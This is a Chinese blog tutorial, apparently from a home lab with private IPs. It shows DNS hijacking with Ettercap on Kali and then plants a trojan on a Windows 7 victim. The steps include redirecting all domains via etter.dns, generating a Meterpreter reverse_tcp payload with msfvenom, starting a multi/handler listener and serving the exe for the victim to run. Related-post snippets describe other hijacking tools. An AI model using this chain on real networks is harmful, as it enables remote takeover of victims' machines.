DNS劫持

已于 2024-10-31 14:54:36 修改
阅读量785 收藏 8
点赞数 5
文章标签: linux
于 2024-10-30 17:44:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80764533/article/details/143358808
版权

初试DNS劫持

DNS劫持

1.DNS劫持介绍

DNS劫持是指在浏览器访问网站时,恶意程序或黑客将域名解析到错误的IP地址,导致用户无法正常访问网站或被导向其他网站的情况。DNS劫持通常发生在网络中某个节点处,通过修改本地DNS缓存或篡改DNS服务器的响应来实现。

2.环境搭建

2.1环境介绍

主机系统IP地址
攻击机kali-linux192.168.72.129
受击机windows 7192.168.72.130

主要使用的技术是kali的Ettercap

2.2环境介绍

2.2.1确定80端口没有被任何程序占用,若被占用则需杀掉端口

端口:每一个应用程序都有对应的端口;80端口就是apache 服务端口,我们需要确保此端口没被占用;
输入命令:lsof -i:80 判断是否被占用
在这里插入图片描述

2.2.2开启端口转发

root
ip-forward 改为1

echo 1 > /proc/sys/net/ipv4/ip_forward
2.2.3开启apache
service apache2 restart
2.2.4测试apache 服务器是否开启

在kali的浏览器中输入 kali的 IP地址
在这里插入图片描述

2.2.5查看本机IP

ifconfig

2.2.6修改 etter.dns 将目标改为本机ip
sudo vi /etc/ettercap/etter.dns

在这里插入图片描述
进入编辑模式,输入命令:

*   A   本机ip

3.使用ettercap进行劫持

3.1启用etterrcap

在这里插入图片描述

3.2

在菜单中找到 Plugins ,选中Manage Plugins
在这里插入图片描述

4.在kali中向Windows中植入木马

4.1生成木马

输入命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe  x>木马文件.exe

在这里插入图片描述
完成后输入pwd即可查看位置;

4.2配置文件并启动监听

输入命令:msfconsole
在这里插入图片描述

输入命令:use exploit/multi/handler
在这里插入图片描述
输入命令:set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
输入命令:set lhost kali的ip
在这里插入图片描述
输入命令:exploit -z -j
在这里插入图片描述
启动监听;输入命令:run
在这里插入图片描述

5.复制木马文件到 /var/www/html

5.1受击机运行木马

在这里插入图片描述
输入命令:service apache2 start
进入Windows虚拟机中,打开网址"kali的ip/木马名称"
在这里插入图片描述

5.2在kali中监听受击机

输入命令:sessions
即可查看被木马如今的用户
在这里插入图片描述

Kali 局域网 DNS 劫持
qq_56724121的博客
04-23 1092
Kali 局域网 DNS 劫持 1. 将kali XP 桥接到物理的无线网卡并且互通 2. 修改 errtercap 的配置文件 => vim /etc/ettercap/etter.dns 3. 启动Apache服务器 service apache2 start 4. 启动 ettercap 图像化界面 => ettercap -G 5.ettercap进行接口设置 ettercap进行攻击目标设置 将扫描到的地址 网关加入t...
360 DNS劫持专杀工具官方版.rar
09-02
《360 DNS劫持专杀工具:网络安全的守护者》 在当今互联网时代,网络安全问题日益凸显,其中DNS劫持是一种常见的网络攻击手段。360作为知名的网络安全公司,针对这一威胁推出了“360 DNS劫持专杀工具官方版”,旨在...
深度剖析 DNS 劫持
银之夏雪的博客
02-07 1037
DNS 劫持作为一种常见的网络安全威胁,给用户的网络安全和个人信息安全带来了极大的风险。了解 DNS 劫持的成因、案例和常见场景,掌握有效的解决方法,对于保障我们的网络安全至关重要。无论是个人用户还是企业组织,都应该高度重视 DNS 劫持问题,采取积极有效的措施,加强网络安全防护,共同营造一个安全、稳定的网络环境。
什么是DNS劫持?怎么防止DNS劫持攻击?
最新发布
shandongjiushen的博客
04-18 1035
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。给自学的小伙伴们的意见是坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。
什么是DNS劫持
linux学习区域
09-03 1454
我们知道,某些网络运营商为了某些目的,对DNS进行了某些操作,导致使用ISP的正常上网设置无法通过域名取得正确的IP地址。常用的手段有:DNS劫持DNS污染。 什么是DNS劫持 DNS劫持就是通过劫持DNS服务器,通过某些手段取得某域名的解析记录控制权,进而修改此域名的解析结果,导致对该域名的访问由原IP地址转入到修改后的指定IP,其结果就是对特定的网址不能访问或访问的是假网址,从而实现窃
C++实现DNS劫持
09-08
DNS劫持源代码,用户可以传一个ip当作DNS服务器,被攻击者的dns会自动指向您的欺诈DNS服务器。
DNS欺骗技术:DNS劫持.docxDNS欺骗技术:DNS劫持all.docxDNS欺骗技术:DNS劫持-(10).DNS劫持的实现方法.docxDNS欺骗技术:DNS劫持-(11).使用社会工
08-31
DNS欺骗技术:DNS劫持.docx DNS欺骗技术:DNS劫持all.docx DNS欺骗技术:DNS劫持_(10).DNS劫持的实现方法.docx DNS欺骗技术:DNS劫持_(11).使用社会工程学进行DNS劫持.docx DNS欺骗技术:DNS劫持_(12).利用...
android 系统 DNS 劫持软件
10-09
可以用于DNS劫持劫持手机上面的DNS访问,把重定向DNS服务器导入到我们自己的服务器上面,然后,想干嘛干嘛 adb push libs/armeabi-v7a/dnsproxy2 /data/local/tmp adb push res/raw/20dnsproxy2 /data/local/tmp ...
使用ettercap进行DNS劫持
安全小白的博客
05-05 991
DNS劫持简介 DNS ( Domain Name System ,域名系 统) ,在互联网上作为域名和IP地址相互映射的 -个分布式数据库。DNS劫持又称域名劫持,是 指在劫持的网络范围内拦截域名解析的请求,分 析请求的域名,把审查范围以外的请求放行,或 者返回假的IP地址或者什么都不做使请求失去响 应,其效果就是对特定的网络不能反应或访问的 是假网址。 DNS劫持后,常见的攻击行为主要有: 网络钓鱼、干扰用户正常访问网络、威胁用户账号 信息及财产安全等。 使用ettercap进行DNS劫持 网关192
简单的进行DNS劫持
Dream丶Boy
01-06 5566
在终端输入:vim /etc/ettercap/etter.dns来编辑dns文件,可以删除里面所有的内容,因为都是演示, 可以新增你需要劫持的域名和目标IP,格式和host文件一致 www.baidu.com A 192.168.1.101 上面的www.baidu.com是目标域名,A是解析的方式,后面的IP就是我们的IP。 在终端输入:ettercap -G启动ettercap客户端 选择网卡后点击右上角启动,启动后,左上角点击放大镜进行扫描 然后点击放大镜右边的服务器列表可以看见所有在线的机器,
DNS劫持 HTTP劫持
smartDMer的专栏
06-21 773
1. DNS劫持 攻击者利用其他攻击手段 (比如劫持了路由器或域名服务器等),篡改了某个域名的解析结果,使得指向该域名的IP变成了另一个IP,导致对相应网址的访问被劫持到另一个不可达的或者假冒的网址,从而实现非法窃取用户信息或者破坏正常网络服务的目的。 2. HTTP劫持 DNS会整个跳转网页不同,网页劫持往往只是在页面上添加一个小窗,但这小窗并不属于网页本身的广告,有时候无论你访问什...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值